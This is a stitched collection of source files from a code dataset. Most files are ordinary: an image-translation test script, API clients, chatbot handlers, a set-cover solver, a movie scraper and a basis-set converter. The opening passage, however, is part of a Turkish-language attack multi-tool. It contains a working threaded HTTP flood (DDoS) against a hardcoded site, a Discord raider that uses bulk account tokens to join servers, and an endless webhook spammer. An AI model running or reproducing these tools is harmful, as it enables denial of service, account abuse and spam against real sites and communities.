os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
f.write(r.text.encode('utf-8'))
f.close()
visited_links.append(l)
def save_assets(html_text):
bs = BeautifulSoup(html_text, "html.parser")
save(bs=bs, element="link", check=".css")
save(bs=bs, element="script", check=".js")
links = bs.find_all("img")
for l in links:
href = l.get("src")
if href is not None and href not in visited_links:
print("indiriliyor : {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l, stream=True)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
shutil.copyfileobj(r.raw, f)
visited_links.append(l)
def crawl(link):
if "http://" not in link and "https://" not in link:
link = site_name + link
if site_name in link and link not in visited_links:
print("indiriliyor : {}".format(link))
path_s = link.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
if file_name[len(file_name) - 1] != "/":
file_name = file_name + "/"
try:
r = requests.get(link)
except requests.exceptions.ConnectionError:
print("bağlantı hatası (cloudflare under attack mode açık olabilir)")
sys.exit(1)
if r.status_code != 200:
print("site yanlış")
sys.exit(1)
print(project_path + file_name + "index.html")
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0] + "index.html", "wb") as f:
text = r.text.replace(site_name, project_name)
f.write(text.encode('utf-8'))
f.close()
visited_links.append(link)
save_assets(r.text)
soup = BeautifulSoup(r.text, "html.parser")
for link in soup.find_all('a'):
try:
crawl(link.get("href"))
except:
error_links.append(link.get("href"))
crawl(site_name + "/")
for link in visited_links:
print("---- {}\n".format(link))
print("\n\n\nhata\n")
for link in error_links:
print("---- {}\n".format(link))
if x == "9":
Spinner()
ddoser = input("Hedef site giriniz örnek.com:")
import socket
import threading
ip = get('https://api.ipify.org').text
target = 'casperss.cf'
fake_ip = ip
port = 80
attack_num = 0
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
print(attack_num)
s.close()
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
attack_num = 0
if x == "10":
Spinner()
print(Fore.MAGENTA + "[1] Token sese sokma")
print(Fore.MAGENTA + "[2] Token yayına sokma")
print(Fore.MAGENTA + "[3] Token sunucuya sokma")
print(Fore.MAGENTA + "[4] About me kısımlarına yazı yazma")
supra = input()
if supra == "3":
print("tokenler.txt ye tokenlarını at")
print("discord invite link giriniz lütfen sadece davet kodunu atınız ( örnek = 21312dwadqw)")
ananxd = input()
tokens = []
with open("tokenler.txt", "r") as tokens_file:
lines = tokens_file.readlines()
for l in lines:
token = tokens.append(l.replace('\n', ''))
def bot_inviter(ananxd,token):
apilink = "https://discordapp.com/api/v6/invite/" + ananxd
headers = {'Authorization': token}
bot_invite = requests.post(apilink, headers=headers)
print(bot_invite.text)
for botz in tokens:
bot_inviter(ananxd, botz)
if supra =="1":
import discord
class MyClient(discord.Client):
async def on_ready(self):
print('Logged on as', self.user)
time.sleep(5)
print('Bot joined the channel.')
channel_id = '929783813024935941'
voice_channel = client.get_channel(channel_id)
await voice_channel.connect()
async def on_message(self, message):
# don't respond to ourselves
if message.author == self.user:
return
if message.content == 'ping':
await message.channel.send('pong')
client = MyClient()
client.run('')
print("çabuk çabuk ses kanalıan gir oç")
if x == "11":
import time
import requests
import pyfiglet
banner = pyfiglet.figlet_format("WEBHOOK SPAMMER")
print(banner)
msg = input("ne spamlamasını istiyorsun keke:")
webhook = input()
def kırbaçlaonu(msg, webhook):
while True:
try:
data = requests.post(webhook, json={'content': msg})
if data.status_code == 204:
print(f"gonderildu{msg}")
except:
print("webhook bozuk:" + webhook)
time.sleep(5)
exit()
anan = 1
while anan == 1:
kırbaçlaonu(msg, webhook)
| 2.421875
| 2
|
main/permissions.py
|
sultanalieva-s/discrourse
| 0
|
12782859
|
<reponame>sultanalieva-s/discrourse
# from rest_framework.permissions import BasePermission
#
#
# class IsOwner(BasePermission):
#
# def has_object_permission(self, req, view, obj):
# return req.user.is_authenticated and req.user == obj.author
#
| 2.109375
| 2
|
test_wsi.py
|
jlevy44/HE2Tri
| 1
|
12782860
|
<filename>test_wsi.py
"""General-purpose test script for image-to-image translation.
Once you have trained your model with train.py, you can use this script to test the model.
It will load a saved model from --checkpoints_dir and save the results to --results_dir.
It first creates model and dataset given the option. It will hard-code some parameters.
It then runs inference for --num_test images and save results to an HTML file.
Example (You need to train models first or download pre-trained models from our website):
Test a CycleGAN model (both sides):
python test.py --dataroot ./datasets/maps --name maps_cyclegan --model cycle_gan
Test a CycleGAN model (one side only):
python test.py --dataroot datasets/horse2zebra/testA --name horse2zebra_pretrained --model test --no_dropout
The option '--model test' is used for generating CycleGAN results only for one side.
This option will automatically set '--dataset_mode single', which only loads the images from one set.
On the contrary, using '--model cycle_gan' requires loading and generating results in both directions,
which is sometimes unnecessary. The results will be saved at ./results/.
Use '--results_dir <directory_path_to_save_result>' to specify the results directory.
Test a pix2pix model:
python test.py --dataroot ./datasets/facades --name facades_pix2pix --model pix2pix --direction BtoA
See options/base_options.py and options/test_options.py for more test options.
See training and test tips at: https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/docs/tips.md
See frequently asked questions at: https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/docs/qa.md
"""
import os
from options.test_wsi_options import TestWSIOptions
from data import create_dataset
from models import create_model
from util.visualizer import save_images
from util import html
import numpy as np
import cv2
import subprocess
import time
from tqdm import tqdm
if __name__ == '__main__':
PROGRAM_START_TIME = time.time()
opt = TestWSIOptions().parse() # get test options
# hard-code some parameters for test
opt.num_threads = 0 # test code only supports num_threads = 1
opt.batch_size = 1 # test code only supports batch_size = 1
opt.serial_batches = True # disable data shuffling; comment this line if results on randomly chosen images are needed.
opt.no_flip = True # no flip; comment this line if results on flipped images are needed.
opt.display_id = -1 # no visdom display; the test code saves the results to a HTML file.
dataset = create_dataset(opt) # create a dataset given opt.dataset_mode and other options
total_iter = opt.load_iter + 1
start_iter = opt.iter_start
if opt.iter_start < 0:
opt.iter_start = opt.load_iter
opt.iter_incr = 1
model = create_model(opt)
if opt.dataset_mode=="wsi":
for iter in range(start_iter, total_iter, opt.iter_incr):
opt.load_iter = iter
print("iter", opt.load_iter)
ITER_START_TIME = time.time()
dataset.dataset.reset()
# create save location for results
subfolder_name = '{}_{}'.format(opt.phase, opt.epoch)
if True: # opt.load_iter > 0: # load_iter is 0 by default
subfolder_name = '{:s}_iter{:d}'.format(subfolder_name, opt.load_iter)
web_dir = os.path.join(opt.results_dir, opt.name, subfolder_name)
new_wsi_filename = opt.wsi_name.replace('.npy', '_converted.npy')
save_path = os.path.join(web_dir, "images", new_wsi_filename)
print('save_path', save_path)
print('creating web directory', web_dir)
webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt.name, opt.phase, opt.epoch))
# create a model given opt.model and other options
model.setup(opt) # regular setup: load and print networks; create schedulers
# test with eval mode. This only affects layers like batchnorm and dropout.
# For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.
# For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.
if opt.eval:
model.eval()
output=[]
for i, data in enumerate(dataset):
model.set_input(data) # unpack data from data loader
model.test() # run inference
img=((model.fake.detach().cpu().numpy()[0].transpose((1,2,0)) + 1.) / 2. * 255.).astype(np.uint8)
dataset.dataset.push_image(i, img)
# if i % 50 == 0:
# print('processing {} - th patch'.format(i))
img_new = dataset.dataset.apply_mask()
np.save(save_path, img_new)
# subprocess.call("python npy2dzi.py --wsi_name {} --web_dir {} --shrink_factor {}".format(new_wsi_filename, web_dir, opt.shrink_factor), shell=True)
print("Iter execution time (s)", time.time() - ITER_START_TIME)
elif opt.dataset_mode=="npy":
# opt.load_iter = iter
# print("iter", opt.load_iter)
ITER_START_TIME = time.time()
# dataset.dataset.reset()
# create save location for results
# subfolder_name = '{}_{}'.format(opt.phase, opt.epoch)
# if True: # opt.load_iter > 0: # load_iter is 0 by default
# subfolder_name = '{:s}_iter{:d}'.format(subfolder_name, opt.load_iter)
# web_dir = os.path.join(opt.results_dir, opt.name, subfolder_name)
save_path = os.path.join(opt.results_dir_wsi,os.path.basename(opt.wsi_name.replace('.npy', '_converted.npy')))
# save_path = os.path.join(web_dir, "images", new_wsi_filename)
# print('save_path', save_path)
# print('creating web directory', web_dir)
# webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt.name, opt.phase, opt.epoch))
# model = create_model(opt) # create a model given opt.model and other options
model.setup(opt) # regular setup: load and print networks; create schedulers
# test with eval mode. This only affects layers like batchnorm and dropout.
# For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.
# For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.
if opt.eval:
model.eval()
output=[]
# print(dir(dataset))
# print(dataset.dataset)
for i, data in tqdm(enumerate(dataset),total=len(dataset)):
model.set_input(data) # unpack data from data loader
model.test() # run inference
img=((model.fake.detach().cpu().numpy()[0].transpose((1,2,0)) + 1.) / 2. * 255.).astype(np.uint8)
dataset.dataset.push_image(i, img)
# if i % 50 == 0:
# print('processing {} - th patch'.format(i))
img_new = dataset.dataset.img_new
np.save(save_path, img_new)
# subprocess.call("python npy2dzi.py --wsi_name {} --web_dir {} --shrink_factor {}".format(new_wsi_filename, web_dir, opt.shrink_factor), shell=True)
print("Iter execution time (s)", time.time() - ITER_START_TIME)
print("Total execution time (s)", time.time() - PROGRAM_START_TIME)
| 3.09375
| 3
|
ThreadFixProApi/Applications/_utils/_team.py
|
denimgroup/threadfix-python-api
| 1
|
12782861
|
<reponame>denimgroup/threadfix-python-api
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "<NAME>"
__copyright__ = "(C) 2019 Denim group"
__contributors__ = ["<NAME>"]
__status__ = "Production"
__license__ = "MIT"
from ...API import API
class TeamsAPI(API):
def __init__(self, host, api_key, verify_ssl, timeout, headers, user_agent, cert, debug):
"""
Initialize a ThreadFix Pro Teams API instance.
:param host: The URL for the ThreadFix Pro server. (e.g., http://localhost:8080/threadfix/) NOTE: must include http:// TODO: make it so that it is required or implicitly added if forgotten
:param api_key: The API key generated on the ThreadFix Pro API Key page.
:param verify_ssl: Specify if API requests will verify the host's SSL certificate, defaults to true.
:param timeout: HTTP timeout in seconds, default is 30.
:param user_agent: HTTP user agent string, default is "threadfix_pro_api/[version]".
:param cert: You can also specify a local cert to use as client side certificate, as a single file (containing
the private key and the certificate) or as a tuple of both file’s path
:param debug: Prints requests and responses, useful for debugging.
"""
super().__init__(host, api_key, verify_ssl, timeout, headers, user_agent, cert, debug)
def create_team(self, name):
"""
Creates a new team
:param name: The name of the new team being created
"""
params = {"name": name}
return super().request('POST', '/teams/new', params, debug=self.debug)
def get_team_by_id(self, team_id):
"""
Retrieves team with id of team_id'
:param team_id: ID of the team being gotten
"""
return super().request('GET', '/teams/' + str(team_id))
def get_team_by_name(self, team_name):
"""
Retrieves team with name of team_name
:param team_name: Name of the team being gotten
"""
return super().request('GET', '/teams/lookup?name=' + str(team_name))
def get_all_teams(self, page=1, page_size=10000):
"""
Retrieves all the teams.
:param page: Which page of findings to retrieve of size "pageSize"
:param page_size: How many findings to retrieve per "page"
"""
params = {'page' : page, 'pageSize' : page_size}
return super().request('GET', '/teams', params)
def update_team(self, team_id, name):
"""
Updates team with teamId
:param team_id: Team identifier
:param name: New name to assign to the team
"""
params = {'name' : name}
return super().request('PUT', '/teams/' + str(team_id) + '/update', params)
def get_team_event_history(self, team_id, pages=None, page_size=None):
"""
Lists event history for a team
:param team_id: Team identifier
:param pages: Number of events to return. By default this method will return up to 10 events
:param page_size: Can be used to return a different page of events, with each page of events containing page_size events
"""
params = {}
if pages:
params['page'] = pages
if page_size:
params['pageSize'] = page_size
return super().request('POST', '/events/organization/' + str(team_id), params)
def delete_team(self, team_id):
"""
Deletes a team by the provided teamId
:param team_id: Team identifier
"""
return super().request('DELETE', '/teams/' + str(team_id) + '/delete')
def view_permissible_users_for_team(self, team_id):
"""
Returns a list of users that have access to the given team
:param team_id: Team identifier
"""
return super().request('DELETE', '/teams/' + str(team_id) + '/users')
def get_event_history_for_team(self, team_id, page=10, number_to_show=20):
"""
Returns list of events for a particular team
:param team_id: ID of team to get history from
:param page: Number of events to return. By default this method will return up to 10 events.
:param number_to_show: Can be used to return a different page of events, with each page of events containing {numberToShow} events. * If not specified, the default limit is 20
"""
params = {'page' : page, 'numberToShow' : number_to_show}
return super().request('POST', '/history/teams/' + str(team_id) + '/history/objects', params)
| 2.40625
| 2
|
two-sum.py
|
ibigbug/leetcode
| 0
|
12782862
|
<gh_stars>0
# Link: https://oj.leetcode.com/problems/two-sum/
class Solution:
# @return a tuple, (index1, index2)
def twoSum(self, num, target):
"""
use hashtable
"""
d = {}
index1 = index2 = 0
for i in range(0, len(num)):
if (target - num[i]) in d:
index1 = d[target - num[i]]
index2 = i
break
else:
d[num[i]] = i
return (index1 + 1, index2 + 1)
| 3.390625
| 3
|
src/programy/clients/restful/asyncio/microsoft/client.py
|
motazsaad/fit-bot-fb-clt
| 0
|
12782863
|
"""
Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
import http.server
import json
import asyncio
from botbuilder.schema import (Activity, ActivityTypes)
from botframework.connector import ConnectorClient
from botframework.connector.auth import (MicrosoftAppCredentials, JwtTokenValidation, SimpleCredentialProvider)
from programy.clients.restful.flask.client import FlaskRestBotClient
from programy.clients.restful.asyncio.microsoft.config import MicrosoftConfiguration
class MicrosoftBotClient(FlaskRestBotClient):
def __init__(self, argument_parser=None):
FlaskRestBotClient.__init__(self, 'microsoft', argument_parser)
YLogger.debug(self, "Microsoft Client is running....")
print("Microsoft Client loaded")
def get_client_configuration(self):
return MicrosoftConfiguration()
def get_microsoft_app_id(self):
return self.license_keys.get_key("MICROSOFT_APP_ID")
def get_microsoft_app_password(self):
return self.license_keys.get_key("MICROSOFT_APP_PASSWORD")
def get_new_user_message(self):
if self.configuration.client_configuration.new_user_srai is not None:
pass
return self.configuration.client_configuration.new_user_text
def ask_question(self, question):
reply = ""
try:
client_context = self.create_client_context("microsoft")
self._questions += 1
reply = client_context.bot.ask_question(client_context, question, responselogger=self)
except Exception as e:
YLogger.exception(client_context, "Error getting reply from bot", e)
return reply
MICROSOFT_CLIENT = MicrosoftBotClient ()
class BotRequestHandler(http.server.BaseHTTPRequestHandler):
@staticmethod
def __create_reply_activity(request_activity, text):
return Activity(
type=ActivityTypes.message,
channel_id=request_activity.channel_id,
conversation=request_activity.conversation,
recipient=request_activity.from_property,
from_property=request_activity.recipient,
text=text,
service_url=request_activity.service_url)
def __handle_conversation_update_activity(self, activity):
self.send_response(202)
self.end_headers()
if len(activity.members_added):
if activity.members_added[0].id != activity.recipient.id:
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
response = MICROSOFT_CLIENT.get_new_user_message()
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector = ConnectorClient(credentials, base_url=reply.service_url)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_message_activity(self, activity):
self.send_response(200)
self.end_headers()
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
connector = ConnectorClient(credentials, base_url=activity.service_url)
response = MICROSOFT_CLIENT.ask_question(activity.text)
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_authentication(self, activity):
credential_provider = SimpleCredentialProvider(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(JwtTokenValidation.authenticate_request(activity,
self.headers.get("Authorization"),
credential_provider))
return True
except Exception as ex:
self.send_response(401, ex)
self.end_headers()
return False
finally:
loop.close()
def __unhandled_activity(self):
self.send_response(404)
self.end_headers()
def do_POST(self):
body = self.rfile.read(int(self.headers['Content-Length']))
data = json.loads(str(body, 'utf-8'))
activity = Activity.deserialize(data)
if not self.__handle_authentication(activity):
return
if activity.type == ActivityTypes.conversation_update.value:
self.__handle_conversation_update_activity(activity)
elif activity.type == ActivityTypes.message.value:
self.__handle_message_activity(activity)
else:
self.__unhandled_activity()
if __name__ == '__main__':
print("Initiating Microsoft Client...")
SERVER = None
try:
host = MICROSOFT_CLIENT.configuration.client_configuration.host
port = MICROSOFT_CLIENT.configuration.client_configuration.port
SERVER = http.server.HTTPServer((host, port), BotRequestHandler)
print('Started http server')
SERVER.serve_forever()
except KeyboardInterrupt:
print('Ctrl received, shutting down server')
if SERVER is not None:
SERVER.socket.close()
| 1.523438
| 2
|
other/dingding/dingtalk/api/rest/OapiFinanceIdCardOcrRequest.py
|
hth945/pytest
| 0
|
12782864
|
'''
Created by auto_sdk on 2021.01.26
'''
from dingtalk.api.base import RestApi
class OapiFinanceIdCardOcrRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.back_picture_url = None
self.front_picture_url = None
self.id_card_no = None
self.request_id = None
self.user_mobile = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.finance.IdCard.ocr'
| 1.898438
| 2
|
plugin/src/test/resources/refactoring/extractmethod/Comment2.before.py
|
consulo/consulo-python
| 0
|
12782865
|
<reponame>consulo/consulo-python
class Foo():
<selection>tmp = "!" #try to extract this assignmet, either with or without this comment</selection>
def bar(self):
pass
| 1.46875
| 1
|
utils.py
|
jiuthree/speaker_recognition
| 0
|
12782866
|
<filename>utils.py<gh_stars>0
from scipy.io import wavfile
import soundfile as sf
#import librosa
def read_wav(fname):
signal, fs = sf.read(fname) # 这两个参数换了个位置, 第二个返回值fs代表了 音频的rate
# fs, signal = wavfile.read(fname);
print(fname)
if len(signal.shape) != 1:
print("convert stereo to mono")
signal = signal[:,0]
return fs, signal
| 2.765625
| 3
|
Rozdzial_4/r4_01.py
|
abixadamj/helion-python
| 1
|
12782867
|
# program r4_01.py
# Sprawdzamy, czy mamy zainstalowane odpowiednie biblilteki zewnętrzne
# Importujemy funkcje dodatkowe
from sys import exit
from r4_functions import *
load_module_ok = True
try:
import numpy as np
ok_module_info("numpy")
except:
error_module_info("numpy")
load_module_ok = False
try:
import matplotlib
ok_module_info("matplotlib")
except:
err_module_info("matplotlib")
load_module_ok = False
try:
from astropy.time import Time
ok_module_info("astropy")
except:
error_module_info("astropy")
load_module_ok = False
try:
from astroquery.jplhorizons import Horizons
ok_module_info("astroquery")
except:
error_module_info("astroquery")
load_module_ok = False
if not load_module_ok:
print("Niestety, wystąpiły błędy.")
print("Nie mogę dalej działać.")
exit(0)
# Teraz mamy zainstalowane wszystkie moduły
print("Super! Możemy działać.")
| 2.25
| 2
|
cp_homebrew_003/cp_state.py
|
DmitriKudryashov/setcover
| 86
|
12782868
|
#!/usr/bin/env python
# encoding: utf-8
from collections import defaultdict
from cp_estimator import Estimator
class State(object):
def __init__(self, estimator, set2items, item2sets,
parent=None, picked_set=None, decision=None):
# Don't use this constructor directly. Use .from_task() instead
self.estimator = estimator # just copy the pointer from the parent for fast access
self.set2items = set2items # {set_index: set(indexes of not covered items)}
self.item2sets = item2sets # {item_index: set(indexes of sets that can cover the item and have no decision yet)}
self.parent = parent # parent state object
self.picked_set = picked_set # picked set index
self.decision = decision # whether we build picked_set or not
self.is_feasible = True
if decision:
self.chosen_sets = {picked_set}
else:
self.chosen_sets = set()
self.propagate_constaints()
if self.is_feasible:
self.recalc_cost()
def recalc_cost(self):
additional = self.estimator.cost_of_chosen_list(self.chosen_sets)
if self.parent is None:
self.current_cost = additional
else:
self.current_cost = self.parent.current_cost + additional
@classmethod
def from_task(cls, task):
# Make initial state
estimator = Estimator(task)
set2items = {s.index: set(s.items) for s in task.sets}
item2sets = defaultdict(set)
for set_idx, set_items in set2items.iteritems():
for item_idx in set_items:
item2sets[item_idx].add(set_idx)
return cls(estimator, set2items, dict(item2sets),
parent=None, picked_set=None, decision=False)
def __repr__(self):
return 'State(picked={},chosen={})'.format(self.picked_set, self.decision)
# Search
def next_child(self):
picked_set = self.estimator.pick_a_set(self)
return self.create_child(picked_set, decision=True)
def create_child(self, picked_set, decision):
set2items = {s: i.copy() for s, i in self.set2items.iteritems()} # Copy for mutating in child state
item2sets = {i: s.copy() for i, s in self.item2sets.iteritems()} # TODO: Copy is expensive. Can we avoid it?
return self.__class__(self.estimator, set2items, item2sets,
parent=self, picked_set=picked_set, decision=decision)
def negate(self):
# Generate sibling state, where picked_set is not chosen
# If we already there, rollback to the parent state and repeat on it
state = self
while state:
if state.decision:
return state.parent.create_child(state.picked_set, decision=False)
else:
state = state.parent
return None # if we have eventually got stat = None, it means that we are reached initial state
# Constraints propagation
def propagate_constaints(self):
if self.decision:
self.propagate_on_choice()
else:
self.propagate_on_toss()
def propagate_on_choice(self):
self.on_sets_chosen(self.chosen_sets) # there is only one set in chosen_sets (picked_set)
def propagate_on_toss(self):
if self.picked_set is not None: # "if we are not at the init state"
orphaned_items = self.set2items.pop(self.picked_set)
for item_idx in orphaned_items:
sets = self.item2sets[item_idx]
sets.remove(self.picked_set)
if not sets:
self.is_feasible = False
# We can't cover the item.
# No matter, what else. State doesn't lead to any feasible solutions
return
# before = len(self.set2items)
# self.remove_expensive_subsets(orphaned_items, # Too expensive calculations :o(
# self.estimator.cost_of_chosen(self.picked_set))
# after = len(self.set2items)
# if after != before:
# self.estimator.metrics['cut_exp'] += 1
# else:
# self.estimator.metrics['not_cut_exp'] += 1
# if not self.is_feasible:
# self.estimator.metrics['rollback_exp'] += 1
# return
# Immediately set 1 for every set that can't be replaced with another set
required_sets = self.detect_required_sets()
self.chosen_sets.update(required_sets)
self.on_sets_chosen(required_sets)
def detect_required_sets(self):
required_sets = set()
for item, sets in self.item2sets.iteritems():
if len(sets) == 1: # only one set can cover this item
required_sets.update(sets)
return required_sets
def on_items_covered(self, to_remove):
overvalued_sets = set()
for item in to_remove:
overvalued_sets.update(self.item2sets.pop(item))
for s in overvalued_sets & set(self.set2items):
items = self.set2items[s]
items -= to_remove
if not items:
del self.set2items[s]
#before = len(self.set2items)
#self.remove_redundant_sets(overvalued_sets & set(self.set2items)) # expensive operation. Work good only on the large datasets
#after = len(self.set2items)
#if after < before:
# print 'profit {}->{}'.format(before, after)
def remove_expensive_subsets(self, items, cost_limit):
# We can cover items with the cost=cost_limit
# But we don't do that. So, we don't want to cover the items with the more expensive sets
costs = self.estimator.set_costs
iter_items = iter(items)
candidates = list(self.item2sets[next(iter_items)])
for cand_idx in candidates:
if costs[cand_idx] >= cost_limit:
cand_items = self.set2items[cand_idx]
if len(cand_items) <= len(items) and cand_items <= items:
del self.set2items[cand_idx]
for item_idx in cand_items:
sets = self.item2sets[item_idx]
sets.remove(cand_idx)
if not sets:
self.is_feasible = False
return # We cant cover the item
def on_sets_chosen(self, sets):
covered_items = set()
for s in sets:
covered_items.update(self.set2items.pop(s))
self.on_items_covered(covered_items)
# Getting info
def is_all_covered(self):
return not self.item2sets
def get_optimistic_cost(self):
return self.estimator.get_optimistic(self)
if __name__ == '__main__':
from reader import read_input
from time import time as now
state = State.from_task(read_input('sc_15_0'))
# st = now()
# state.remove_redundant_sets()
# print now() - st
| 2.6875
| 3
|
app/display_modules/beta_div/tests/test_module.py
|
MetaGenScope/metagenscope-server
| 0
|
12782869
|
"""Test suite for Beta Diversity display module."""
from app.display_modules.beta_div import BetaDiversityDisplayModule
from app.display_modules.beta_div.models import BetaDiversityResult
from app.display_modules.beta_div import MODULE_NAME
from app.display_modules.display_module_base_test import BaseDisplayModuleTest
from app.tool_results.beta_diversity.models import BetaDiversityToolResult
from app.tool_results.beta_diversity.tests.factory import create_ranks
from tests.utils import add_sample_group
from .factory import BetaDiversityFactory
class TestBetaDivModule(BaseDisplayModuleTest):
"""Test suite for Beta Diversity diplay module."""
def test_add_beta_div(self):
"""Ensure Beta Diversity model is created correctly."""
ranks = create_ranks()
beta_div_result = BetaDiversityResult(data=ranks)
self.generic_adder_test(beta_div_result, MODULE_NAME)
def test_get_beta_div(self):
"""Ensure getting a single Beta Diversity behaves correctly."""
beta_div_result = BetaDiversityFactory()
self.generic_getter_test(beta_div_result, MODULE_NAME,
verify_fields=('data',))
def test_run_beta_div_sample_group(self): # pylint: disable=invalid-name
"""Ensure Beta Diversity run_sample_group produces correct results."""
def create_sample_group():
"""Create unique sample for index i."""
sample_group = add_sample_group(name='SampleGroup01')
ranks = create_ranks()
BetaDiversityToolResult(sample_group_uuid=sample_group.id, data=ranks).save()
return sample_group
self.generic_run_group_test(None,
BetaDiversityDisplayModule,
group_builder=create_sample_group)
| 2.34375
| 2
|
250_indian_movies_imdb/web1.py
|
Pratiknavgurukul/Web_Scraping
| 6
|
12782870
|
import requests,pprint,json
from bs4 import BeautifulSoup
url=requests.get("https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in")
soup=BeautifulSoup(url.text,"lxml")
def scrape_top_list():
tbody= soup.find("tbody",class_="lister-list")
all_movies=[]
for tr in tbody.find_all("tr"):
dic={}
dic["ratting"]=float(tr.find("td",class_="ratingColumn imdbRating").text)
for td in tr.find_all("td",class_="titleColumn"):
nam=""
dic["Url"]="https://www.imdb.com/"+td.find("a")["href"][:16]
nyp=[]
for letter in td.text:
nam+=letter
if letter=="\n":
nyp.append(nam.strip())
nam=""
dic["position"]=int(nyp[1][:-1])
dic["nam"] = str(nyp[2])
dic["year"]=int(nyp[3][1:-1])
all_movies.append(dic)
with open("movies.json","w") as file:
data=json.dumps(all_movies)
file.write(data)
return all_movies
# pprint.pprint(scrape_top_list())
| 3.15625
| 3
|
basis_set_exchange/convert.py
|
BasisSetExchange/basis_set_exchange
| 4
|
12782871
|
<reponame>BasisSetExchange/basis_set_exchange
# Copyright (c) 2017-2022 The Molecular Sciences Software Institute, Virginia Tech
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
'''
Functions for basis set conversion
'''
from .readers import read_formatted_basis_file, read_formatted_basis_str
from .writers import write_formatted_basis_file, write_formatted_basis_str
from .manip import make_general
def convert_formatted_basis_str(basis_in, in_fmt, out_fmt):
'''Convert a formatted basis set to another format
Parameters
----------
basis_in : str
String representing the formatted input basis set input
in_fmt : str
The format of the basis set stored in basis_in
out_fmt : str
The desired output format
Returns
-------
str
The basis set as a str with the new format
'''
basis_dict = read_formatted_basis_str(basis_in, in_fmt, validate=True, as_component=False)
return write_formatted_basis_str(basis_dict, out_fmt)
def convert_formatted_basis_file(file_path_in,
file_path_out,
in_fmt=None,
out_fmt=None,
encoding='utf-8-sig',
make_gen=False):
